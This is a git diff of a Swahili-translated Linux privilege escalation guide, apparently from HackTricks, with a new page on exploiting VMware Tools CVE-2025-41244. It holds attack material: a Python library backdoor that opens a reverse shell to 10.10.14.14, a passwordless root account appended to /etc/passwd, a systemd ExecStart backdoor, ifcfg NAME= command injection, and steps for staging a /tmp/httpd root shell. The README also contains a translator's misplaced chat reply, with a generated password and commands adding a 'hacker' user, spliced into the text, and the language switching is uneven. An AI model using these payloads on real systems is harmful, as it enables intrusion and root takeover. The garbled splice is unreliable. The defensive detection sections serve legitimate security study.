hacker python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")' ``` -I don't have access to src/linux-hardening/privilege-escalation/README.md. Please paste the file contents you want translated and I'll return the Swahili translation preserving all markdown/html/tags/paths. +I don’t have the file contents of src/linux-hardening/privilege-escalation/README.md. Please paste the README.md content you want translated (or give permission to read it if you can provide access). -Meanwhile, here is a generated strong password and the exact commands to add the user hacker and set that password (do not translate these commands): +When you send the file contents I will: +- Translate the relevant English text to Swahili, preserving all markdown/html/tags/paths exactly as requested. +- Then generate a secure password and provide the exact commands you can run (as root) to add the user hacker and apply that password. -Generated password: -G7r$2pQx9Vz!bL4s +If you want me to generate the password now so you have it immediately, tell me whether you prefer: +- plain text password shown here, or +- a hashed password (bcrypt/sha512) to insert into /etc/shadow, or +- a command that sets the password on the target host (e.g., using chpasswd). -Commands: -sudo useradd -m -s /bin/bash hacker -echo 'hacker:G7r$2pQx9Vz!bL4s' | sudo chpasswd -sudo passwd -e hacker - -Paste the README content when ready and I'll translate it. +Which option do you prefer? ``` hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash ``` Mfano: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` -Sasa unaweza kutumia amri ya `su` kwa `hacker:hacker` +Sasa unaweza kutumia amri ya `su` kwa kutumia `hacker:hacker` -Vinginevyo, unaweza kutumia mistari ifuatayo kuongeza mtumiaji wa bandia bila nywila.\ ONYO: huenda ukapunguza usalama wa mashine. +Vinginevyo, unaweza kutumia mistari ifuatayo kuongeza mtumiaji wa bandia bila nenosiri.\ +ONYO: inaweza kupunguza usalama wa sasa wa mashine. ``` echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd su - dummy ``` -TAARIFA: Katika majukwaa ya BSD `/etc/passwd` iko `/etc/pwd.db` na `/etc/master.passwd`, pia `/etc/shadow` imebadilishwa kuwa `/etc/spwd.db`. +Kumbuka: Katika majukwaa ya BSD `/etc/passwd` iko kwenye `/etc/pwd.db` na `/etc/master.passwd`, pia `/etc/shadow` imebadilishwa jina kuwa `/etc/spwd.db`. -Unapaswa kuangalia kama unaweza **kuandika katika baadhi ya faili nyeti**. Kwa mfano, je, unaweza kuandika kwenye baadhi ya **faili ya usanidi ya huduma**? +Unapaswa kuangalia ikiwa unaweza **kuandika katika baadhi ya faili nyeti**. Kwa mfano, unaweza kuandika kwenye baadhi ya **faili za usanidi za huduma**? ```bash find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq #Find files owned by the user or writable by anybody for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done #Find files writable by any group of the user ``` -Kwa mfano, ikiwa mashine inaendesha seva ya **tomcat** na unaweza **kubadilisha faili ya usanidi wa huduma ya Tomcat ndani ya /etc/systemd/,** basi unaweza kubadilisha mistari: +Kwa mfano, ikiwa mashine inaendesha server ya **tomcat** na unaweza **kuhariri faili ya usanidi wa huduma ya Tomcat ndani ya /etc/systemd/,** basi unaweza kubadilisha mistari: ``` ExecStart=/path/to/backdoor User=root Group=root ``` -Backdoor yako itatekelezwa mara ijayo tomcat itakapowashwa. +Backdoor yako itaendeshwa mara ijayo tomcat itakapowashwa. -### Kagua Mafolda +### Angalia Folda -Mafolda yafuatayo yanaweza kuwa na chelezo au taarifa za kuvutia: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** (Huenda hutaweza kusoma ya mwisho lakini jaribu) +Folda zifuatazo zinaweza kuwa na chelezo au taarifa za kuvutia: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** (Labda hutaweza kusoma ya mwisho, lakini jaribu) ```bash ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root ``` -### Mahali Ajabu/Faili Zilizomilikiwa +### Eneo la Ajabu/Owned files ```bash #root owned files in /home folders find /home -user root 2>/dev/null @@ -1327,11 +1354,11 @@ find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -pat done done ``` -### Faili zilizobadilishwa katika dakika chache zilizopita +### Faili zilizobadilishwa katika dakika za hivi punde ```bash find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null ``` -### Faili za Sqlite DB +### Sqlite DB mafayela ```bash find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null ``` @@ -1339,7 +1366,7 @@ find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null ```bash find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null ``` -### Mafaili yaliyofichwa +### Faili zilizofichwa ```bash find / -type f -iname ".*" -ls 2>/dev/null ``` @@ -1359,22 +1386,22 @@ ls -alhR /opt/lampp/htdocs/ 2>/dev/null ```bash find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/null ``` -### Faili zinazojulikana zenye passwords +### Faili zinazojulikana zinazoweza kuwa na nywila -Soma msimbo wa [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), inatafuta **faili kadhaa zinazowezekana ambazo zinaweza kuwa na passwords**.\ -**Chombo kingine cha kuvutia** unachoweza kutumia ili kufanya hivyo ni: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) ambayo ni programu ya chanzo wazi inayotumika kupata passwords nyingi zilizohifadhiwa kwenye kompyuta ya eneo kwa Windows, Linux & Mac. +Soma msimbo wa [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), inatafuta **faili kadhaa zinazowezekana ambazo zinaweza kuwa na nywila**.\ +**Chombo kingine cha kuvutia** ambacho unaweza kutumia kwa hili ni: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) ambacho ni programu ya chanzo wazi inayotumika kupata nywila nyingi zilizohifadhiwa kwenye kompyuta ya ndani kwa Windows, Linux & Mac. -### Logs +### Logi -Ikiwa unaweza kusoma logs, unaweza kupata **taarifa za kuvutia/za siri ndani yao**. Kadri logi inavyokuwa ya ajabu zaidi, ndivyo itakavyokuwa ya kuvutia zaidi (labda).\ -Pia, baadhi ya **mbaya** zilizosetwa (backdoored?) **audit logs** zinaweza kukuwezesha **kurekodi passwords** ndani ya audit logs kama ilivyoelezwa katika chapisho hili: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/] +Ikiwa unaweza kusoma logi, unaweza kufanikiwa kupata **taarifa za kuvutia/za siri ndani yao**. Kadri logi inavyo kuwa ya ajabu zaidi, ndivyo itakavyokuwa ya kuvutia (labda).\ +Pia, baadhi ya **mbaya** configured (backdoored?) **audit logs** zinaweza kukuwezesha **kurekodi nywila** ndani ya audit logs kama ilivyoelezwa katika chapisho hiki: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/). ```bash aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g" grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null ``` -**Ili kusoma logi, kundi** [**adm**](interesting-groups-linux-pe/index.html#adm-group) kitakuwa msaada mkubwa. +Ili **kikundi kinachoweza kusoma logs** [**adm**](interesting-groups-linux-pe/index.html#adm-group) kitakuwa msaada mkubwa. -### Mafaili ya shell +### Shell files ```bash ~/.bash_profile # if it exists, read it once when you log in to the shell ~/.bash_login # if it exists, read it once if .bash_profile doesn't exist @@ -1385,43 +1412,43 @@ grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null ~/.zlogin #zsh shell ~/.zshrc #zsh shell ``` -### Utafutaji wa Creds za Kawaida/Regex +### Generic Creds Search/Regex -Unapaswa pia kuangalia faili zinazojumuisha neno "**password**" katika **jina** au ndani ya **maudhui**, na pia angalia IPs na emails ndani ya logs, au hashes regexps.\ -Sitasema hapa jinsi ya kufanya yote haya lakini ikiwa una nia unaweza kuangalia ukaguzi wa mwisho ambao [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) hufanya. +Unapaswa pia kuangalia faili zenye neno "**password**" katika **jina** au ndani ya **content**, na pia angalia IPs na emails ndani ya logs, au hashes regexps.\ +Sitaorodhesha hapa jinsi ya kufanya yote haya lakini ikiwa una nia unaweza kuangalia ukaguzi wa mwisho ambao [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) perform. -## Faili Zinazoweza Kuandikwa +## Writable files ### Python library hijacking -Ikiwa unajua kutoka **wapi** script ya python itatekelezwa na unaweza **kuandika ndani** ya folda hiyo au unaweza **kuhariri python libraries**, unaweza kubadilisha maktaba ya os na kuitia backdoor (ikiwa unaweza kuandika mahali script ya python itatekelezwa, nakili na paste maktaba ya os.py). +Kama unajua kutoka **where** script ya python itaendeshwa na unaweza **can write inside** folda hiyo au unaweza **modify python libraries**, unaweza kubadilisha OS library na kuiweka backdoor (kama unaweza kuandika mahali script ya python itaendeshwa, copy na paste maktaba os.py). -Ili **backdoor the library** ongeza tu mwishoni wa maktaba ya os.py mstari ufuatao (badilisha IP na PORT): +To **backdoor the library** just add at the end of the os.py library the following line (change IP and PORT): ```python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); ``` -### Kutumia udhaifu wa logrotate +### Uvamizi wa logrotate -Udhaifu katika `logrotate` unawawezesha watumiaji walio na **write permissions** kwenye faili ya logi au saraka zake za juu kupata vibali vilivyoongezeka. Hii ni kwa sababu `logrotate`, mara nyingi ikikimbia kama **root**, inaweza kudhibitiwa kutekeleza faili yoyote, hasa katika saraka kama _**/etc/bash_completion.d/**_. Ni muhimu kukagua ruhusa sio tu katika _/var/log_ bali pia katika saraka yoyote ambapo log rotation inafanyika. +Udhaifu katika `logrotate` unamruhusu watumiaji wenye **ruhusa za kuandika** (write permissions) kwenye faili ya logi au saraka zake za juu kupata uwezo wa kuongeza ruhusa (escalated privileges). Hii ni kwa sababu `logrotate`, mara nyingi ikikimbia kama **root**, inaweza kudanganywa ili kuendesha faili zozote, hasa katika saraka kama _**/etc/bash_completion.d/**_. Ni muhimu kukagua ruhusa si tu katika _/var/log_ bali pia katika saraka yoyote ambapo rotation ya logi inafanywa. > [!TIP] -> Udhaifu huu unaathiri `logrotate` version `3.18.0` and older +> Udhaifu huu unahusu `logrotate` toleo `3.18.0` na zilizo zamani -Taarifa za kina kuhusu udhaifu zinaweza kupatikana hapa: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition). +Taarifa za undani kuhusu udhaifu zinaweza kupatikana hapa: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition). Unaweza kutumia udhaifu huu kwa kutumia [**logrotten**](https://github.com/whotwagner/logrotten). -Udhaifu huu ni sawa sana na [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs),** hivyo mara yoyote unapoona unaweza kubadilisha logi, angalia nani anayesimamia zile logi na ujaribu kuona kama unaweza kuinua vibali kwa kubadilisha logi kwa symlinks. +Udhaifu huu ni sawa sana na [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs),** hivyo kila unapogundua unaweza kubadilisha logi, angalia nani anayesimamia logi hizo na ujaribu kuona kama unaweza kuongeza ruhusa kwa kubadilisha logi kwa symlinks. ### /etc/sysconfig/network-scripts/ (Centos/Redhat) -**Rejea ya udhaifu:** [**https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f) +**Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f) -Ikiwa, kwa sababu yoyote ile, mtumiaji anaweza **write** script ya `ifcf-` ndani ya _/etc/sysconfig/network-scripts_ **au** anaweza **adjust** ile iliyopo, basi mfumo wako **is pwned**. +Ikiwa, kwa sababu yoyote ile, mtumiaji anaweza **kuandika** script ya `ifcf-` kwenye _/etc/sysconfig/network-scripts_ **AU** anaweza **kurekebisha** moja iliyopo, basi **mfumo wako umepwned**. -Network scripts, mfano _ifcg-eth0_, hutumika kwa muunganisho wa mtandao. Zinaonekana kama faili za .INI. Hata hivyo, zinakuwa \~sourced\~ kwenye Linux na Network Manager (dispatcher.d). +Network scripts, _ifcg-eth0_ kwa mfano, zinatumika kwa muunganisho wa mtandao. Zinataonekana kamili kama faili za .INI. Hata hivyo, zinatolewa ~sourced~ kwenye Linux na Network Manager (dispatcher.d). -Katika kesi yangu, sehemu iliyo katika `NAME=` katika network scripts hizi haishughulikiwa ipasavyo. Ikiwa una **white/blank space in the name the system tries to execute the part after the white/blank space**. Hii inamaanisha kwamba **everything after the first blank space is executed as root**. +Katika kesi yangu, `NAME=` iliyopo katika network scripts hizi haishughulikiwi ipasavyo. Ikiwa una **white/blank space katika jina mfumo unajaribu kutekeleza sehemu iliyofuata baada ya white/blank space**. Hii inamaanisha kwamba **kila kitu baada ya nafasi ya kwanza kinatekelezwa kama root**. Kwa mfano: _/etc/sysconfig/network-scripts/ifcfg-1337_ ```bash @@ -1429,17 +1456,17 @@ NAME=Network /bin/id ONBOOT=yes DEVICE=eth0 ``` -(_Kumbuka nafasi tupu kati ya Network na /bin/id_) +(_Kumbuka nafasi tupu kati ya Mtandao na /bin/id_) -### **init, init.d, systemd, na rc.d** +### **init, init.d, systemd, and rc.d** -The directory `/etc/init.d` is home to **scripts** for System V init (SysVinit), the **classic Linux service management system**. It includes scripts to `start`, `stop`, `restart`, and sometimes `reload` services. These can be executed directly or through symbolic links found in `/etc/rc?.d/`. An alternative path in Redhat systems is `/etc/rc.d/init.d`. +The directory `/etc/init.d` ni nyumbani kwa **scripts** za System V init (SysVinit), **mfumo wa jadi wa usimamizi wa huduma za Linux**. Inajumuisha scripts za `start`, `stop`, `restart`, na wakati mwingine `reload` huduma. Hizi zinaweza kutekelezwa moja kwa moja au kupitia symbolic links zinazopatikana katika `/etc/rc?.d/`. Njia mbadala katika mifumo ya Redhat ni `/etc/rc.d/init.d`. -On the other hand, `/etc/init` is associated with **Upstart**, a newer **service management** introduced by Ubuntu, using configuration files for service management tasks. Despite the transition to Upstart, SysVinit scripts are still utilized alongside Upstart configurations due to a compatibility layer in Upstart. +Kwa upande mwingine, `/etc/init` inahusishwa na **Upstart**, mfumo mpya wa **service management** ulioanzishwa na Ubuntu, unaotumia faili za usanidi kwa kazi za usimamizi wa huduma. Licha ya mpito kwenda Upstart, SysVinit scripts bado zinatumiwa pamoja na usanidi wa Upstart kutokana na tabaka la ulinganifu (compatibility layer) katika Upstart. -**systemd** emerges as a modern initialization and service manager, offering advanced features such as on-demand daemon starting, automount management, and system state snapshots. It organizes files into `/usr/lib/systemd/` for distribution packages and `/etc/systemd/system/` for administrator modifications, streamlining the system administration process. +**systemd** inajitokeza kama meneja wa kisasa wa uanzishaji na huduma, ikitoa vipengele vya juu kama kuanzisha daemons kwa mahitaji (on-demand daemon starting), usimamizi wa automount, na snapshots za hali ya mfumo. Inapanga faili katika `/usr/lib/systemd/` kwa pakiti za distribution na `/etc/systemd/system/` kwa mabadiliko ya msimamizi, ikorahisisha mchakato wa usimamizi wa mfumo. -## Mbinu nyingine +## Mbinu Nyingine ### NFS Privilege escalation @@ -1464,14 +1491,24 @@ cisco-vmanage.md ## Android rooting frameworks: manager-channel abuse -Android rooting frameworks commonly hook a syscall to expose privileged kernel functionality to a userspace manager. Weak manager authentication (e.g., signature checks based on FD-order or poor password schemes) can enable a local app to impersonate the manager and escalate to root on already-rooted devices. Learn more and exploitation details here: +Android rooting frameworks kwa kawaida hushikilia syscall ili kufunua utendakazi wa kernel wenye ruhusa kwa manager wa userspace. Uthibitishaji dhaifu wa manager (kwa mfano, ukaguzi wa signatures unaotegemea FD-order au mipangilio duni ya nywila) unaweza kumwezesha app ya ndani kujifanya manager na kuinuka hadi root kwenye vifaa ambayo tayari vimepata root. Jifunze zaidi na maelezo ya eksploiti hapa: {{#ref}} android-rooting-frameworks-manager-auth-bypass-syscall-hook.md {{#endref}} -## Ulinzi wa Usalama wa Kernel +## VMware Tools service discovery LPE (CWE-426) via regex-based exec (CVE-2025-41244) + +Regex-driven service discovery katika VMware Tools/Aria Operations inaweza kutoa njia ya binary kutoka kwa mistari ya amri za mchakato na kuitekeleza kwa kutumia -v chini ya muktadha wenye ruhusa. Patterns zinazoruhusu mengi (kwa mfano, kutumia \S) zinaweza kuendana na listeners zilizoandaliwa na mshambulizi katika maeneo yanayoweza kuandikwa (kwa mfano, /tmp/httpd), zikisababisha utekelezaji kama root (CWE-426 Untrusted Search Path). + +Jifunze zaidi na uone mtindo uliobadilishwa unaoweza kutumika kwa discovery/monitoring stacks nyingine hapa: + +{{#ref}} +vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md +{{#endref}} + +## Kernel Security Protections - [https://github.com/a13xp0p0v/kconfig-hardened-check](https://github.com/a13xp0p0v/kconfig-hardened-check) - [https://github.com/a13xp0p0v/linux-kernel-defence-map](https://github.com/a13xp0p0v/linux-kernel-defence-map) @@ -1482,7 +1519,7 @@ android-rooting-frameworks-manager-auth-bypass-syscall-hook.md ## Linux/Unix Privesc Tools -### **Chombo bora cha kutafuta Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) +### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) **LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)(-t option)\ **Enumy**: [https://github.com/luke-goddard/enumy](https://github.com/luke-goddard/enumy)\ @@ -1492,11 +1529,15 @@ android-rooting-frameworks-manager-auth-bypass-syscall-hook.md **Kernelpop:** Enumerate kernel vulns ins linux and MAC [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)\ **Mestaploit:** _**multi/recon/local_exploit_suggester**_\ **Linux Exploit Suggester:** [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)\ -**EvilAbigail (physical access):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail)\ +**EvilAbigail (upatikanaji wa kimwili):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail)\ **Recopilation of more scripts**: [https://github.com/1N3/PrivEsc](https://github.com/1N3/PrivEsc) ## Marejeo +- [0xdf – HTB Planning (Crontab UI privesc, zip -P creds reuse)](https://0xdf.gitlab.io/2025/09/13/htb-planning.html) +- [alseambusher/crontab-ui](https://github.com/alseambusher/crontab-ui) + + - [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) - [https://payatu.com/guide-linux-privilege-escalation/](https://payatu.com/guide-linux-privilege-escalation/) - [https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744](https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744) @@ -1518,4 +1559,6 @@ android-rooting-frameworks-manager-auth-bypass-syscall-hook.md - [GNU Bash Manual – BASH_ENV (non-interactive startup file)](https://www.gnu.org/software/bash/manual/bash.html#index-BASH_005fENV) - [0xdf – HTB Environment (sudo env_keep BASH_ENV → root)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html) +- [NVISO – You name it, VMware elevates it (CVE-2025-41244)](https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/) + {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md b/src/linux-hardening/privilege-escalation/vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md new file mode 100644 index 000000000..1659f9396 --- /dev/null +++ b/src/linux-hardening/privilege-escalation/vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md @@ -0,0 +1,146 @@ +# VMware Tools service discovery LPE (CWE-426) via regex-based binary discovery (CVE-2025-41244) + +{{#include ../../banners/hacktricks-training.md}} + +Mbinu hii inatumia pipelines za ugundaji huduma zinazotegemea regex ambazo huchambua mistari ya amri ya michakato inayofanya kazi ili kubaini toleo la service kisha kutekeleza binary inayoweza kuwa mgombea kwa flag ya "version". Wakati pattern zilizo permissive zinakubali njia zisizo salama, zinazoendeshwa na mshambuliaji (kwa mfano, /tmp/httpd), collector yenye haki za juu hutekeleza binary yoyote kutoka kwenye eneo lisilo salama, ikitoa escalation ya ruhusa ya ndani. NVISO ilidokeza hili katika VMware Tools/Aria Operations Service Discovery kama CVE-2025-41244. + +- Impact: Local privilege escalation to root (or to the privileged discovery account) +- Root cause: Untrusted Search Path (CWE-426) + permissive regex matching of process command lines +- Affected: open-vm-tools/VMware Tools on Linux (credential-less discovery), VMware Aria Operations SDMP (credential-based discovery via Tools/proxy) + +## How VMware service discovery works (high level) + +- Credential-based (legacy): Aria inatekeleza script za discovery ndani ya guest kupitia VMware Tools kwa kutumia credentials za privilegi zilizo konfigurishwa. +- Credential-less (modern): Logic ya discovery inaendeshwa ndani ya VMware Tools, tayari ikiwa na haki za juu ndani ya guest. + +Viwendo vyote vinakimbia mantiki ya shell inayoscan processes zenye sockets za kusikiliza, inachota njia ya command inayofanana kupitia regex, na kisha inatekeleza argv token ya kwanza kwa flag ya version. + +## Root cause and vulnerable pattern (open-vm-tools) + +Katika open-vm-tools, script ya plugin ya serviceDiscovery get-versions.sh inalinganisha candidate binaries kwa kutumia regular expressions pana na inatekeleza argv token ya kwanza bila uthibitisho wowote wa trusted-path: +```bash +get_version() { +PATTERN=$1 +VERSION_OPTION=$2 +for p in $space_separated_pids +do +COMMAND=$(get_command_line $p | grep -Eo "$PATTERN") +[ ! -z "$COMMAND" ] && echo VERSIONSTART "$p" "$("${COMMAND%%[[:space:]]*}" $VERSION_OPTION 2>&1)" VERSIONEND +done +} +``` +Inaitwa kwa patterns zenye uvumilivu zinazojumuisha \S (isiyo-blanki) ambazo zitafanana kwa urahisi na njia zisizo za mfumo katika maeneo yanayoweza kuandikwa na mtumiaji: +```bash +get_version "/\S+/(httpd-prefork|httpd|httpd2-prefork)($|\s)" -v +get_version "/usr/(bin|sbin)/apache\S*" -v +get_version "/\S+/mysqld($|\s)" -V +get_version "\.?/\S*nginx($|\s)" -v +get_version "/\S+/srm/bin/vmware-dr($|\s)" --version +get_version "/\S+/dataserver($|\s)" -v +``` +- Utoaji unatumia grep -Eo na inachukua tokeni ya kwanza: ${COMMAND%%[[:space:]]*} +- Hakuna whitelist/allowlist ya njia za mfumo zilizoaminika; listener yoyote iliyogunduliwa yenye jina linalolingana hufanywa execute na -v/--version + +Hili linaunda primitive ya utekelezaji kupitia untrusted search path: binaries yoyote iliyoko katika world-writable directories (mf., /tmp/httpd) hufanywa execute na sehemu yenye ruhusa za juu. + +## Utekelezaji (hali zote bila cheti na kwa kutumia cheti) + +Preconditions +- Unaweza kuendesha mchakato usio na ruhusa ambao unafungua listening socket kwenye guest. +- Discovery job imewezeshwa na inaendeshwa kwa vipindi (kwa kihistoria ~dakika 5). + +Steps +1) Weka binary katika njia inayolingana na moja ya permissive regexes, mf., /tmp/httpd au ./nginx +2) Iendeshe kama mtumiaji mwenye ruhusa ndogo na hakikisha inafungua listening socket yoyote +3) Subiri mzunguko wa discovery; privileged collector itaendesha moja kwa moja: /tmp/httpd -v (au sawa), ikiwasha programu yako kama root + +Minimal demo (ikitumia mbinu ya NVISO) +```bash +# Build any small helper that: +# - default mode: opens a dummy TCP listener +# - when called with -v/--version: performs the privileged action (e.g., connect to an abstract UNIX socket and spawn /bin/sh -i) +# Example staging and trigger +cp your_helper /tmp/httpd +chmod +x /tmp/httpd +/tmp/httpd # run as low-priv user and wait for the cycle +# After the next cycle, expect a root shell or your privileged action +``` +Mfuatano wa kawaida wa mchakato +- Credential-based: /usr/bin/vmtoolsd -> /bin/sh /tmp/VMware-SDMP-Scripts-.../script_...sh -> /tmp/httpd -v -> /bin/sh -i +- Credential-less: /bin/sh .../get-versions.sh -> /tmp/httpd -v -> /bin/sh -i + +Vibaki (credential-based) +Scripts za wrapper za SDMP zilizopatikana chini ya /tmp/VMware-SDMP-Scripts-{UUID}/ zinaweza kuonyesha utekelezaji wa moja kwa moja wa njia isiyo ya kawaida: +```bash +/tmp/httpd -v >"/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stdout" 2>"/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stderr" +``` +## Kuiboresha mbinu: regex-driven discovery abuse (portable pattern) + +Wakala wengi na suites za ufuatiliaji hufanya ugundaji wa toleo/huduma kwa: +- Kuorodhesha michakato yenye sockets za kusikiliza +- Kufanya grep kwenye argv/line za amri kwa regex zenye uvumilivu (mfano, patterns zenye \S) +- Kutekeleza njia iliyoendana na hiyo kwa bendera isiyokuwa hatari kama -v, --version, -V, -h + +Ikiwa regex inakubali njia zisizo salama na njia hiyo inatekelezwa kutoka kwa muktadha wa mamlaka, utapata CWE-426 Untrusted Search Path execution. + +Mwongozo wa matumizi mabaya +- Jina binary yako kama daemons za kawaida ambazo regex inaweza kuzipata: httpd, nginx, mysqld, dataserver +- Iweka kwenye directory inayoweza kuandikwa: /tmp/httpd, ./nginx +- Hakikisha inafanana na regex na inafungua bandari yoyote itakayoorodheshwa +- Subiri collector iliyopangwa; utapata uanzishaji wa kiotomatiki wa -v kwa nafasi za juu + +Masquerading note: Hii inaendana na MITRE ATT&CK T1036.005 (Match Legitimate Name or Location) ili kuongeza uwezekano wa kufanana na kupunguza kugunduliwa. + +Reusable privileged I/O relay trick +- Jenga helper yako ili wakati inapoanzishwa kwa hadhi ya juu (-v/--version) iungane na rendezvous inayojulikana (mfano, Linux abstract UNIX socket kama @cve) na iunganishe stdio na /bin/sh -i. Hii inazuia artifacts zilizo kwenye diski na inafanya kazi katika mazingira mengi ambapo binary ile ile inarudiwa na bendera. + +## Ugunduzi na mwongozo wa DFIR + +Maswali ya ufuatiliaji +- Watoto wasio wa kawaida wa vmtoolsd au get-versions.sh kama /tmp/httpd, ./nginx, /tmp/mysqld +- Utekelezaji wowote wa njia za absolute zisizo za system na scripts za discovery (angalia nafasi katika expansions za ${COMMAND%%...}) +- ps -ef --forest kwa kuona miti ya asili: vmtoolsd -> get-versions.sh -> + +Katika Aria SDMP (credential-based) +- Kagua /tmp/VMware-SDMP-Scripts-{UUID}/ kwa scripts za muda na artifacts za stdout/stderr zinazoonyesha utekelezaji wa njia za mshambuliaji + +Sera/telemetri +- Onyesha tahadhari wakati collectors wenye mamlaka wanaanzisha kutoka viongozo visivyo vya system: ^/(tmp|home|var/tmp|dev/shm)/ +- Ufuatiliaji wa uadilifu wa faili kwenye get-versions.sh na VMware Tools plugins + +## Kupunguza madhara + +- Sasisha: Tumia updates za Broadcom/VMware kwa CVE-2025-41244 (Tools and Aria Operations SDMP) +- Zima au zuia ugundaji usio na nyaraka inapowezekana +- Thibitisha njia za kuaminika: zuia utekelezaji kwa directories zilizo kwenye allowlist (/usr/sbin, /usr/bin, /sbin, /bin) na tu binaries zilizoeleweka kwa usahihi +- Epuka regex zenye uvumilivu zenye \S; chagua paths za absolute zilizo wazi na majina ya amri yaliyosanidiwa (anchored, explicit) +- Punguza mamlaka kwa discovery helpers pale inapowezekana; tumia sandbox (seccomp/AppArmor) kupunguza athari +- Fuatilia na onya kuhusu vmtoolsd/get-versions.sh zinapoendesha paths zisizo za system + +## Vidokezo kwa walinda na watekelezaji + +Mfumo salama zaidi wa mechi na utekelezaji +```bash +# Bad: permissive regex and blind exec +COMMAND=$(get_command_line "$pid" | grep -Eo "/\\S+/nginx(\$|\\s)") +[ -n "$COMMAND" ] && "${COMMAND%%[[:space:]]*}" -v + +# Good: strict allowlist + path checks +candidate=$(get_command_line "$pid" | awk '{print $1}') +case "$candidate" in +/usr/sbin/nginx|/usr/sbin/httpd|/usr/sbin/apache2) +"$candidate" -v 2>&1 ;; +*) +: # ignore non-allowlisted paths +;; +esac +``` +## Marejeo + +- [NVISO – You name it, VMware elevates it (CVE-2025-41244)](https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/) +- [Broadcom advisory for CVE-2025-41244](https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36149) +- [open-vm-tools – 